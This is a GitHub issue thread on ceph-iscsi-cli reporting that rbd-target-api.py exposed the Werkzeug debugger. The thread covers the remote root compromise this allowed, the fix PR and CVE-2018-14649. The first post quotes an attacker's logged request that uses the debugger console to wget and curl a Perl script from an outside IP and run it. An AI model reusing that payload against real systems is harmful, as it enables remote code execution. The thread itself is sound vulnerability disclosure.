rbd-target-api.py exploited.

[realasmo]

Hello,

I've found that the python code was used to compromise our host remotely (in our case it was running as root so the attacker gained root privileges), the logs contains:

2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - 185.234.217.11 - - [23/Sep/2018 05:23:53] "GET /console?s=7qfxpQm7KShU7OzAilrU&cmd=import+os%3B+os.system%28%27wget+-qO+-+http%3A%2F%2F195.22.126.16%2Fbt.txt%7Cperl%3Bcd+%2Ftmp%3Bcurl+-O+http%3A%2F%2F195.22.126.16%2Fbt.txt%3Bperl+bt.txt%3Brm+-rf+bt.txt%2A%27%29&__debugger__=yes&frm=0 HTTP/1.1" 200 -

Hope this helps.

[dillaman]

@realasmo Thanks for the report of the exposed Werkzeug exploit. I'll open a PR to fix it ASAP.

[realasmo]

the end of the logfile contains __debugger__=yes, so this may (or may not) be related:

https://www.exploit-db.com/exploits/43905/

[dillaman]

Flask is enabling the Werkzeug debugger here [1]

[1] https://github.com/ceph/ceph-iscsi-cli/blob/master/rbd-target-api.py#L2007

[sidhax]

CVE-2018-14649 has been assigned for this flaw

[dillaman]

See PR #121

[dillaman]

Resolved -- also https://github.com/ceph/ceph/pull/24248 includes a documentation update to note that this API should not be publicly accessible.

[abergmann]

CVE-2018-14649 was assigned to this issue.

See also rh#1632078 for additional information.